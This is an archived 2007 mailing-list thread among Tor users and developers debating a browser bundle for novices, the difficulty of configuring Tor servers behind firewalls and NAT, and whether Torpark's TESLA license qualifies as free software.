> Sometimes, a "less free" license is required to keep your developers
> happy. I wrote up some slides about this (as it relates to security
> software):
>
> http://metasploit.com/confs/fosdem/economics.pdf

Re: Re[2]: Ultimate solution

[H D Moore]

This non-commercial clause prevents it from being "Free" and "Open" as the 
OSI and FSF define it. Metasploit 3 has a similar license. TorPark is 
still "free" as in beer, its just not "Free" as in speech. You can 
grumble all you like about it, but at the end of the day, its still their 
time and effort going into the project.

Sometimes, a "less free" license is required to keep your developers 
happy. I wrote up some slides about this (as it relates to security 
software):

http://metasploit.com/confs/fosdem/economics.pdf

-HD

On Sunday 25 March 2007 10:26, Kasimir Gabert wrote:
> · So long as You do not subvert or infringe the freedoms of end-users
> by doing so, You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.

Re: Ultimate solution

[Andrew Del Vecchio]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Guys, if you're that paranoid, why not insist on the BSD license? If
the man wrote the code himself, it's his prerogative to choose the
terms. You may not like them, but ultimately it's his choice, not
yours, since he wrote the code. I prefer the GPL myself, and use it
for everything I do (also FDL and/or CC for written works). Point of
info: is

Kasimir Gabert the owner of Torrify, LLC? If so, I would very much
like to ask him about an important legal question, not related to this
particular discussion.

Thanks,
Andrew

- ---

Frivolous lawsuits. Unlawful government seizures. What's YOUR defense?
Protect your assets, keep what you earn, and generate more income at the
same time!
Visit http://www.mpassetprotection.com/ today.




On 03/25/2007 10:56 AM, Arrakis wrote:
> Nick,
>
> You  are  right.  We  don't allow governments to subvert our
> software, commercial competitors, or people to install spyware and
> redistributed that way.
>
> Saying free and open-source software isn't "Free" and "Open Source"
> is giving  in to a combination of semantics and snobbery of
> licensing. It isn't  as  though  any  organization owns the
> definition of "Free" and "Open  Source"  and has the authority to
> pin it down to their specific hoops we must jump through, nor
> should anyone assume we have.
>
> The source is totally free, and that isn't "Free" but free,
> _except_ I don't allow for other commercial services to rip it off
> and use it for their  personal  gain since I am giving it away to
> the public, and you can't install tracking/spyware/malware in it
> and then redistribute it. Those  are  pretty  much  the  only
> restrictions. Perhaps GPL fanatics think  I  owe  it  to spyware
> manufacturers, or I need to give away my intellectual  property to
> every 3rd-rate commercial anonymity service? The  bottom  line  is,
> everyone benefits by these restrictions, except for malware
> manufacturers and commercial anonymity services.
>
>> I'm no lawyer, but the term in the license above seems like a
>> clear violation of the Debian Free Software Guidelines to me.
>
> I think your software is a pretty clear violation of the TESLA
> license because you specifically allow spyware and malware to be
> inserted into your  software due to your licensing terms, but then
> again, you didn't release  yours  under TESLA, and nor am I
> required to conform to DFSG. Because  I've seen the light of an
> ethical software license agreement, I  no  longer give much
> credence to "Open-Source" definition or "Free" according to hoyle
> or DFSG.
>
> But it definitely is a balance that must be struck. Tor probably
> has a good license, even if it isn't 3 clause BSD, because it is
> straight up difficult  to  use  for  the average user. But Torpark
> is too easy for conforming  to those definitions, because with
> convenience it makes to a  little  too  easy  for  malware and
> snoopers to reach users because users no longer have to have a
> techinical understanding or perform due dilligence  on  their
> software, so we have to provide some protection for them. The TESLA
> license is just that.
>
> To be quite clear, I am enamoured by the HESSLA.
> http://www.hacktivismo.com/about/hessla.php
>
> Regards, Steve
>
>
>
>
>
>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGBq2ggwZR2XMkZmQRA+U3AKC6CrXz4GQBjlr8kMbei1wM0YJ7GACgiRpB
XXkBNmUpbxwOl0xySnJNuHY=
=ObHI
-END PGP SIGNATURE-

Re[4]: Ultimate solution

[Arrakis]

Nick,

You  are  right.  We  don't allow governments to subvert our software,
commercial competitors, or people to install spyware and redistributed
that way.

Saying free and open-source software isn't "Free" and "Open Source" is
giving  in to a combination of semantics and snobbery of licensing. It
isn't  as  though  any  organization owns the definition of "Free" and
"Open  Source"  and has the authority to pin it down to their specific
hoops we must jump through, nor should anyone assume we have.

The source is totally free, and that isn't "Free" but free, _except_ I
don't allow for other commercial services to rip it off and use it for
their  personal  gain since I am giving it away to the public, and you
can't install tracking/spyware/malware in it and then redistribute it.
Those  are  pretty  much  the  only restrictions. Perhaps GPL fanatics
think  I  owe  it  to spyware manufacturers, or I need to give away my
intellectual  property to every 3rd-rate commercial anonymity service?
The  bottom  line  is, everyone benefits by these restrictions, except
for malware manufacturers and commercial anonymity services.

> I'm no lawyer, but the term in the license above seems like a clear
> violation of the Debian Free Software Guidelines to me.

I think your software is a pretty clear violation of the TESLA license
because you specifically allow spyware and malware to be inserted into
your  software due to your licensing terms, but then again, you didn't
release  yours  under TESLA, and nor am I required to conform to DFSG.
Because  I've seen the light of an ethical software license agreement,
I  no  longer give much credence to "Open-Source" definition or "Free"
according to hoyle or DFSG.

But it definitely is a balance that must be struck. Tor probably has a
good license, even if it isn't 3 clause BSD, because it is straight up
difficult  to  use  for  the average user. But Torpark is too easy for
conforming  to those definitions, because with convenience it makes to
a  little  too  easy  for  malware and snoopers to reach users because
users no longer have to have a techinical understanding or perform due
dilligence  on  their  software, so we have to provide some protection
for them. The TESLA license is just that.

To be quite clear, I am enamoured by the HESSLA.
http://www.hacktivismo.com/about/hessla.php

Regards,
Steve

Re: Re[2]: Ultimate solution

[Nick Mathewson]

On Sun, Mar 25, 2007 at 09:26:09AM -0600, Kasimir Gabert wrote:
 [...]
> 
> ? So long as You do not subvert or infringe the freedoms of end-users
> by doing so, You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.
  [...]
> 
> Sounds rather free to me...

When free software people ask "is a license free?" they usually are
asking whether it conforms to the Debian Free Software Guidelines or
the Open Source Definition.

I'm no lawyer, but the term in the license above seems like a clear
violation of the Debian Free Software Guidelines to me.  In
particular, it violates guideline 5 ("No Discrimination Against
Persons or Groups") and possibly guideline 6 ("No Discrimination
Against Fields of Endeavor").  The restriction on what you can modify
it to do seems to controvert guideline 2 ("Derived Works"), .  These
same requirements appear in the Open Source Definition.  Thus, the
license is neither a Free Software license nor an Open Source license,
unless you mean free-as-in-beer.

I won't touch on the other issues here.

cheers,
-- 
Nick


pgpBoLsR6i5uO.pgp
Description: PGP signature

Re: Re[2]: Ultimate solution

[Drake Wilson]

Quoth Kasimir Gabert <[EMAIL PROTECTED]>, on 2007-03-25 09:26:09 -0600:
[quoting another level]
> · So long as You do not subvert or infringe the freedoms of end-users
> by doing so,

Who determines what qualifies as "subverting or infringing the
freedoms of end-users"?

> You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.

And this is, I gather, derived from the idea of "you may not start up
a competing service using a modified version of this software".  I
will remain deliberately silent on the question of whether this is
justified, but nonetheless, that clause is non-free in the extreme.

So no, if the above clauses are part of the license in the context in
which they were indicated in the previous message, then Torpark is not
free software.

   ---> Drake Wilson


signature.asc
Description: Digital signature

Re: Re[2]: Ultimate solution

[Kasimir Gabert]

http://update.torrify.com/distro/torpark/Torpark_latest.zip

http://www.torrify.com/tesla.html
===
· You have the freedom to distribute unmodified copies of the software
(and charge for this service if You wish);

· You have the freedom of access to the source code, to inspect and
verify (and even to improve, if You can) the integrity and
functionality of the software;

· So long as You do not subvert or infringe the freedoms of end-users
by doing so, You have the freedom to change the software or to use
parts of it in new Programs; However, these softwares are not allowed
to be modified to use any commercial proxy or connectivity service or
product other than those offered by Torrify LLC or the Tor Project,
without written permission of Torrify LLC.

· You have the freedom to know You can do these things.
===

Sounds rather free to me...

Kasimir

On 3/25/07, Koh Choon Lin <[EMAIL PROTECTED]> wrote:

> 2) Torpark is not commercial, it is totally free and open source.

> And  lastly, TORPARK IS FREE. It just isn't released under the GPL, it
> is  released  under  the TESLA license, which is similar to the HESSLA
> license.  Because the way it is written GPL can have malware inserted,
> the TESLA makes a legally actionable violation if malware is inserted.

Torpark is not free software.




--
Kasimir Gabert

Re: Re[2]: Ultimate solution

[Koh Choon Lin]

2) Torpark is not commercial, it is totally free and open source.



And  lastly, TORPARK IS FREE. It just isn't released under the GPL, it
is  released  under  the TESLA license, which is similar to the HESSLA
license.  Because the way it is written GPL can have malware inserted,
the TESLA makes a legally actionable violation if malware is inserted.


Torpark is not free software.

Re[2]: Ultimate solution

[Arrakis]

JT,

I wrote Torpark, so let me respond to your points.

1) Torpark is only for windows at the moment, it will be available for
Mac and Linux shortly.

2) Torpark is not commercial, it is totally free and open source. We
simply offer an upgrade to get higher speeds than the tor network can
provide.

3)  The  fact  that  trust  isn't  distributed  is  a  positive, not a
negative,  because you don't have to trust everyone with your outgoing
plaintext traffic. We have independent security auditors make sure our
admins  are  not tracking anyone or doing anything malicious. However,
we are using a distributed trust internally, so if anyone comes asking
for  customer info, they won't get them without NSA letters to all our
associates  in  all  our  jurisdictions.  And  naurally, free users of
torpark we don't have any records of anyway.

4)  The  online  tutorial  is  only a video for streaming. Perhaps you
would  prefer  to download the 25mb file directly? Or perhaps you know
of  a  way  to  stream video without using scripting? I'll be happy to
listen.

5)  Offshore  from  the  USA,  UK,  etc.  We  have servers in Germany,
Malaysia,  and  some other hidden places. Currently none in the USA or
UK,  etc.  Unfortunately,  it  is  better to not tell you specifically
where  they  are  because  that  makes  it much harder for agencies to
attempt  to  subpoena/court order. If they are guessing jurisdictions,
we  are  all  happier.  Bottom line is place faith in audits. Further,
Torrify  is  formed as an offshore corp in the country of Saint Kitts,
so it is not subject to US laws, only those of UK Commonwealth and the
UN.

6) http://www.hacktivismo.com

Regarding commercial anonymity, you will eventually realize that it is
the only way to go for high speed and low latency, otherwise the
network will be abused and suffer the tragedy of the commons.

Further, the browser is entirely capable of having no flash, java,
javascript, plugins, and all of those are blocked by default.

And  lastly, TORPARK IS FREE. It just isn't released under the GPL, it
is  released  under  the TESLA license, which is similar to the HESSLA
license.  Because the way it is written GPL can have malware inserted,
the TESLA makes a legally actionable violation if malware is inserted.
With such sensitive project, I insist that people are not legally able
to abuse it.

http://www.torrify.com/tesla.html

Regards,

Steve Topletz

Re: Ultimate solution

[phobos]

On Sat, Mar 24, 2007 at 08:03:08AM +, [EMAIL PROTECTED] wrote 1.4K bytes in 
39 lines about:
: I am told that my router is a firewall. There are also
: Windows' own firewall and other commercial 'total
: protection suites'. I know what gnats are but not what
: a NAT is. And please, how do I 'punch a hole' in any
: of them?

See, that's my point.  Tor can only do so much.  Figuring out
how to change your firewalls, NATs, 'total protection suites',
and routers is nearly impossible.  There are things we would
like to do to make Tor easier to be a point-click-server.  There
are things we'd like to not have to do to be a
point-click-server.  One of these is magically be able to
auto-configure every operating system, network, firewall, 'total
protection suite', and router.  Yes, that's both the "we'd like
to do it" and "we'd like not to do it".
: 
: So why should java and javascript be a problem?

Regardless of OS, this FAQ answer is valid:
http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#TotallyAnonymous


: Trying to help case by case will likely take up an
: unacceptable amount of the developers' time.
: Efficiency  lies in standardisation and mass
: production. So Mr Freemor, I concur with you on the

Yes, standardization is great.  And the great thing about
standardization in the world is there are so many standards from
which to choose.  The Tor client is pretty much mass produced
and easy to use.  We continue to work on the server end, but the
realities of passing traffic keep getting in the way.

I hear the collective frustration and desire for a point-click-server
solution.  Help us work on solutions.

As for your specific case, sy_c16, we're happy to help you out
in getting a server running.

-- 
Andrew

Re: Ultimate solution

[Freemor]

On Fri, 2007-23-03 at 22:04 -0700, Andrew Del Vecchio wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: RIPEMD160
> 
> Freemor,
> What if it was done in a way that educates and informs users, such
> as how Bastille Linux works? Someone could probably easily create an
> installer/GUI config program that teaches the user about network
> security as he uses it. I'm no coder, but I understand a good feature
> when I see it! This may be why I sometimes act as a buffer between
> clients and the techies that can't easily relate to 'noobs'. What do
> you like about this idea?
> 
> Gracias,
> Andrew
> 

That may be a workable model, and I definitely like the educational side
of it. My concern is how would it intercept errors the user was making
in non TOR applications. (i.e. warn them that logging into a non https
site may leak their password, etc). There are now several viable
browsers that users could choose to use with TOR and I think it would be
difficult to make such an application as the one you suggest be able to
intercept all the various gaffs.

  In my experience many users will, and do, go out of their way to
circumvent their own protection unless very aware of the consequences,
and sometimes even then. If they really want to see that funny flash
animation on a certain site, they will find a way to do it and then
often forget to undo the changes they made there by leaving they selves
vulnerable. 

  I'm not saying it's not do-able I'm just not sure how one could
implement it given all the various browser, plug-in, etc. combinations
that will get thrown at it.

Freemor
 



--

Freemor <[EMAIL PROTECTED]>
Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG




signature.asc
Description: This is a digitally signed message part

Re: Ultimate solution

[Freemor]

On Sat, 2007-24-03 at 08:52 -0400, Paul Syverson wrote:
> On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> > 
> > P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> > That just snuck in there as I deal with computer security regularly and
> > often see the same "the computer/internet/isp/mysterious someone" should
> > take care of that for me mentality.   
> > 
> 
> I don't understand this statement. Tor was reasearched and developed
> by and for the US DoD as an onion routing project, the explicit purpose
> of which is security for DoD and other communications:
> traffic analysis resistance, DoS resistance, personnel protection,
> etc.
> 
> -Paul

I can see your point and TOR does have some security applications if
used in properly and with those goals in mind. (i.e. only connecting to
https or other encrypted endpoints). The main goal of TOR is clearly
anonymity. If the main goal was security having data leave the exit
nodes in the clear would be a definite no no. I was also just being
clear that I did not think of TOR as a
firewall/antivirus/anti-malware/etc system when I used the term
Security. 

Freemor

--

Freemor <[EMAIL PROTECTED]>
Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG




signature.asc
Description: This is a digitally signed message part

Re: Ultimate solution

[Paul Syverson]

On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> 
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.   
> 

I don't understand this statement. Tor was reasearched and developed
by and for the US DoD as an onion routing project, the explicit purpose
of which is security for DoD and other communications:
traffic analysis resistance, DoS resistance, personnel protection,
etc.

-Paul

Re: Ultimate solution

[sy16]

Dear Mr phobos, I know just enough to enable loggin,
and I can see there is something called UPNP disabled.
Right. But I didn't do it. Where is it, and should I
turn it on?

I am told that my router is a firewall. There are also
Windows' own firewall and other commercial 'total
protection suites'. I know what gnats are but not what
a NAT is. And please, how do I 'punch a hole' in any
of them?

I did use Vidalia. No success in my log. For my Linux
box, lotsa handshakes, onion skins, 3 cells, 6 cells,
a child wants to read, another wants to write, more
handshakes, then warning failure orport not reachable.

OT, I have a linux box because I am so fed up with
being hacked and remote-administered, and Debian said
nothing could be installed without my root password -
I hope I understood this much correctly?

So why should java and javascript be a problem?

Trying to help case by case will likely take up an
unacceptable amount of the developers' time.
Efficiency  lies in standardisation and mass
production. So Mr Freemor, I concur with you on the
need for user education. I absolutely agree with Mr
del Vacchio about making the process as painless as
possible. 

Clement





___ 
The all-new Yahoo! Mail goes wherever you go - free your email address from 
your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html

Re: Ultimate solution

[Tin Tin]

1) Torpark is only for windows
2) Torpar is commercial
3) no distributed trust
4) they want you to install flash player for an online tutorial
5) stuck up marketing people say it is offshore. offshore from what?
antarctica?
6) they advertise that Torpark was developed by Hackers. a statement
like that attracts the wrong people

I don't believe in commercial anonymity solution.


Why don't we create a petition or something alike to the developers of
Torpark to release it as a free (GPLed) software?

Re: Ultimate solution

[Andrew Del Vecchio]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Freemor,
What if it was done in a way that educates and informs users, such
as how Bastille Linux works? Someone could probably easily create an
installer/GUI config program that teaches the user about network
security as he uses it. I'm no coder, but I understand a good feature
when I see it! This may be why I sometimes act as a buffer between
clients and the techies that can't easily relate to 'noobs'. What do
you like about this idea?

Gracias,
Andrew

- ---

Frivolous lawsuits. Unlawful government seizures. What's YOUR defense?
Protect your assets, keep what you earn, and generate more income at the
same time!
Visit http://www.mpassetprotection.com/ today.




On 03/23/2007 09:50 PM, Freemor wrote:
>   I've been watching this thread with some interest and just wanted to
> add my view to the discussion. I think there is a real danger in making
> TOR too easy. Yes, I do understand that Microsoft and others have
> created a world of people that want every program to function completely
> with 3 clicks. For some applications this is a laudable goal.
>
>   However, when one is dealing with a program that deals with security
> or anonymity I think it is important that people who intend to use the
> program take the time and effort to learn. They need to learn what it
> does, what it doesn't do, how it does it, how it is circumvented, how to
> check if it is working correctly, etc. One of the major reasons there is
> so much tracking of personal data on the web is most users lack of
> responsibility for their own privacy and security.
>
>   For these reasons, my concern is that making TOR a 3 click wonder will
> not only further propagate this "some one else will worry about my
> privacy/security for me" thinking and ultimately would lead people to a
> false sense of security because they wont properly understand the TOR
> network, and will blissfully find ways to make their computer leak more
> then a bucket with no bottom, all the while thinking "oh, it's fine,
> I've got TOR on, I can see the icon in the systray right there".
>
>   I feel that rather then head down the 3 click wonder path, it would be
> better to invest time in reminding users that we are talking about their
> security, or their anonymity, that as such it is their responsibility,
> and decidedly worth the time to learn as much as possible about the
> programs or systems they use to protect it.
>
>   I would hate to see the day when the TOR team has to waste countless
> hours and resources to battle complaints that "TOR failed to protect me
> when I ".
>
> Just my thoughts on the subject
>
> Freemor
>
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.  
>
>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGBLFygwZR2XMkZmQRA23KAKCkiZiO64p9PQ0WqdvsWTaJ0PSb+QCdHuHh
b1WOI57aGHGYdHcQaqOjzyw=
=AwEQ
-END PGP SIGNATURE-

Re: Ultimate solution

[Freemor]

  I've been watching this thread with some interest and just wanted to
add my view to the discussion. I think there is a real danger in making
TOR too easy. Yes, I do understand that Microsoft and others have
created a world of people that want every program to function completely
with 3 clicks. For some applications this is a laudable goal. 

  However, when one is dealing with a program that deals with security
or anonymity I think it is important that people who intend to use the
program take the time and effort to learn. They need to learn what it
does, what it doesn't do, how it does it, how it is circumvented, how to
check if it is working correctly, etc. One of the major reasons there is
so much tracking of personal data on the web is most users lack of
responsibility for their own privacy and security.

  For these reasons, my concern is that making TOR a 3 click wonder will
not only further propagate this "some one else will worry about my
privacy/security for me" thinking and ultimately would lead people to a
false sense of security because they wont properly understand the TOR
network, and will blissfully find ways to make their computer leak more
then a bucket with no bottom, all the while thinking "oh, it's fine,
I've got TOR on, I can see the icon in the systray right there".

  I feel that rather then head down the 3 click wonder path, it would be
better to invest time in reminding users that we are talking about their
security, or their anonymity, that as such it is their responsibility,
and decidedly worth the time to learn as much as possible about the
programs or systems they use to protect it. 

  I would hate to see the day when the TOR team has to waste countless
hours and resources to battle complaints that "TOR failed to protect me
when I ".

Just my thoughts on the subject

Freemor

P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
That just snuck in there as I deal with computer security regularly and
often see the same "the computer/internet/isp/mysterious someone" should
take care of that for me mentality.   

On Fri, 2007-23-03 at 02:44 -0700, JT wrote:
> Hi,
> 
> why spend hundreds and thousands of hours of coding?
> 
> Is there a browser that doesn't support javascript, java, flash,
> quicktime, etc but only pictures so one can read html text and pictures
> and can read a normal newspaper? If there is such a browser why not
> force Tor users to use it? Make Tor only work with that browser.
> 
> If Tor wants to be an anonymous communication tool it should come in an
> entire package. If Tor wants to be successful it MUST come in  complete
> package.
> 90% of the users use it to surf anonymously, the rest use ftp, chat or
> whatever.
> 
> How about instead of telling a user to:
> 
> install tor and vidalia
> activate tor
> install the tor button
> intstall the noscript
> install flashblock
> configure noscript
> deactivate flash, etc
> install cookie culler 
> turn off the referer header in the browser
> etc
> etc
> 
> have them just install the "package for free communication".
> That way there is no way they can forget to turn anything off or on.
> That way every person that uses the "Tor package for free communication"
> can benefit from the expertise of the people that release the package.
> All the "hacks" that are published are not against Tor but against the
> users "communication package" that the users put together himself. Why
> not help/force internet noobs to be safe.
> 
> I know it is called the Tor project but why not extend it to a real
> communication package. Vidalia was as good start. Now one step further!!
> 
> Is there a free open source browser that could be shipped with the Tor
> package that is fully configured for anonymous surfing and fine tuned to
> be most anonymous, set so that it can be only used through Tor? It
> should be modified so that a noob can not change the settins by
> accident.
> 
> I am not a programmer but this is what must happen. If Tor is only
> supposed to be for technical experts and people that hang out in
> security forums every day then we should continue as is but if Tor is
> supposed to be for the masses(more people more distributed trust) then
> there must be a bundle. A package with everything set up for anonymous
> browsing where some internet newbie can not possibly reveal his IP by
> misconfiguration. The user clicks the setup program Tor installs, the
> Tor browser opens, ready to go. No way the surfer can use that browser
> without Tor.
> 
> Such a software package would make Moore's publications completely
> uncecessary.
> 
> I wish I could help implement this but I am not a programmer.
> 
> But this is the only way for Tor to succeed. A software bundle including
> perfectly configured browser, every user must be a server, and there
> must be a button with which people can choose to be an exit or not.
> Right now it is way to difficult. If grandma and grandpa are capable of
> choosing to be a serv

Re: Ultimate solution

[phobos]

On Fri, Mar 23, 2007 at 03:32:15PM +, [EMAIL PROTECTED] wrote 0.8K bytes in 
20 lines about:
: Yes, please come out with a ready server package. I am
: a noob who sometimes don't even understand the
: messages in the log (and not at all the debug log).

Tor is a server and client in the same package.  Configuring Tor
as a server is easy.  Configuring the rest of your network and
firewalls to allow traffic to ebb and flow is not always so
easy.  Even there existed a LiveCD for a Tor server that
magically configures itself on start, getting it to work with
the network isn't so "boot and run" easy.  There is a 3-step
process to getting a Tor server up and running:

http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#CanIJustConfigureAndRun

Or you can use Vidalia to make it easier.  The hard part is
firewalls, NAT, port forwarding, etc.  Universal Plug and Play
(UPNP) is used by some vendors to make their software
autoconfigure the network for you.  Most security conscious
people disable UPNP because of the poor implementations from a
security perspective.  Search the web for "UPNP exploits", for an
example.  Therefore, this makes the problem set Tor has to test
and solve far more complex.  We rely upon the user to know their
network better than Tor can ever ascertain.  

Our FAQ tries to answer many of these questions for you.  Or,
there is OR-TALK for help.  If our documentation is lacking,
please let us know how to make it more clear and better.  We'll
also happily accept updates to the wiki or patches to the actual
docs.  

We'll happily accept "Tor Server in a box" type bundles.  If you
can magically figure out the networking parts of it, "go you!"  

-- 
Andrew

Re: Ultimate solution

[sy16]

Thank you JT, you expressed so eloquently what I have
been thinking.

Yes, please come out with a ready server package. I am
a noob who sometimes don't even understand the
messages in the log (and not at all the debug log). I
have been trying to get my boxes to run as servers for
weeks. No luck. And I don't know where and how to get
help. I am very grateful for the security tor has
given me, and would like to contribute to the
community instead of just taking, taking. It would be
great if we could have a default server package.





___ 
New Yahoo! Mail is the ultimate force in competitive emailing. Find out more at 
the Yahoo! Mail Championships. Plus: play games and win prizes. 
http://uk.rd.yahoo.com/evt=44106/*http://mail.yahoo.net/uk 

Re: Ultimate solution

[JT]

On Fri, 23 Mar 2007 20:13:30 +0800, "Tin Tin" <[EMAIL PROTECTED]> said:
> > why spend hundreds and thousands of hours of coding?
> 
> Torpark is a start, no?

Thx but no thx.

1) Torpark is only for windows
2) Torpar is commercial
3) no distributed trust
4) they want you to install flash player for an online tutorial
5) stuck up marketing people say it is offshore. offshore from what?
antarctica?
6) they advertise that Torpark was developed by Hackers. a statement
like that attracts the wrong people

A browser that leaves no traces is great, yes.

I don't believe in commercial anonymity solution. Companies can develop
lots of great useful software but an anonymity service needs to be open
source, not bound to one jurisdiction, decentral and dedicated to
security(not already telling people to install dangerous software like
flash) before they even signed up. How professional is that?

I still believe Tor must be bundled with a browser that is perfectly
configured to be run with Tor. Nothing commercial. Along with a
webserver that starts with Tor and is also preconfigured by Tor
experts(maybe we can bring an Apache expert into the Tor team).
Every user must be a router giving a certain percentage of their
bandwidth otherwise Tor will not work.
The people that object to this can choose to use different software. But
I doubt that there would be any. Looks at all the P2P networks. People
give their bandwith because there is no other way. Nobody complains. -->
emule

Also, I just searched 7 different security communities for the keyword
"Tor". On 6 of them people asked if there was anything faster than Tor.
The number of Tor servers will increase extremey slowly with the current
implementation. Only experts that can figure out how to setup a server
will contribute to the speed. I am not a computer genius but it took me
a while to figure out how a Tor server works. Now how can a noob run a
Tor server.
Only if he is one by default.

But now imagine a total computer noob with and extremely fast connection
who just joined the network. He will doesn't know anything about the
internal workings of Tor and he doesn't have to and still he can
contribute so much to make Tor better by contributing his very fast
internet connectin. If every user has a chance to use a webserver that
is already ready to go a real tor internet will start to evolve and
people won't need to exit the Tor network. There won't be time to check
out www pages if there are tons of Tor pages. :)

Also if the client base becomes the router base the distributed trust
explodes. The biggest contributers in terms of server right now are USA
and Germany.
If they ban anonymity services in Germany(which is not so unlikely) it
is going to be a problem for the network. But if every user is a router,
then even a grandma in Kenia whose nephew set up her Tor software or an
internet cafe in Chile can contribute to distributed trust without
having to configure anything. The number of possible circuits would
explode. And nobody could just start a boulder type attack.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Does exactly what it says on the tin

Re: Ultimate solution

[Tin Tin]

why spend hundreds and thousands of hours of coding?


Torpark is a start, no?

Ultimate solution

[JT]

Hi,

why spend hundreds and thousands of hours of coding?

Is there a browser that doesn't support javascript, java, flash,
quicktime, etc but only pictures so one can read html text and pictures
and can read a normal newspaper? If there is such a browser why not
force Tor users to use it? Make Tor only work with that browser.

If Tor wants to be an anonymous communication tool it should come in an
entire package. If Tor wants to be successful it MUST come in  complete
package.
90% of the users use it to surf anonymously, the rest use ftp, chat or
whatever.

How about instead of telling a user to:

install tor and vidalia
activate tor
install the tor button
intstall the noscript
install flashblock
configure noscript
deactivate flash, etc
install cookie culler 
turn off the referer header in the browser
etc
etc

have them just install the "package for free communication".
That way there is no way they can forget to turn anything off or on.
That way every person that uses the "Tor package for free communication"
can benefit from the expertise of the people that release the package.
All the "hacks" that are published are not against Tor but against the
users "communication package" that the users put together himself. Why
not help/force internet noobs to be safe.

I know it is called the Tor project but why not extend it to a real
communication package. Vidalia was as good start. Now one step further!!

Is there a free open source browser that could be shipped with the Tor
package that is fully configured for anonymous surfing and fine tuned to
be most anonymous, set so that it can be only used through Tor? It
should be modified so that a noob can not change the settins by
accident.

I am not a programmer but this is what must happen. If Tor is only
supposed to be for technical experts and people that hang out in
security forums every day then we should continue as is but if Tor is
supposed to be for the masses(more people more distributed trust) then
there must be a bundle. A package with everything set up for anonymous
browsing where some internet newbie can not possibly reveal his IP by
misconfiguration. The user clicks the setup program Tor installs, the
Tor browser opens, ready to go. No way the surfer can use that browser
without Tor.

Such a software package would make Moore's publications completely
uncecessary.

I wish I could help implement this but I am not a programmer.

But this is the only way for Tor to succeed. A software bundle including
perfectly configured browser, every user must be a server, and there
must be a button with which people can choose to be an exit or not.
Right now it is way to difficult. If grandma and grandpa are capable of
choosing to be a server or exit nodes then Tor will become extremely
popular and successful. But everybody must be a router(like I2P). There
is no other way. Taking the client user base and making it a router base
would solve many problems and the possible combinations of paths (n-k-1
over k) would be so huge that an attack where the adversay controls all
routers in the path would be almost impossible.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Does exactly what it says on the tin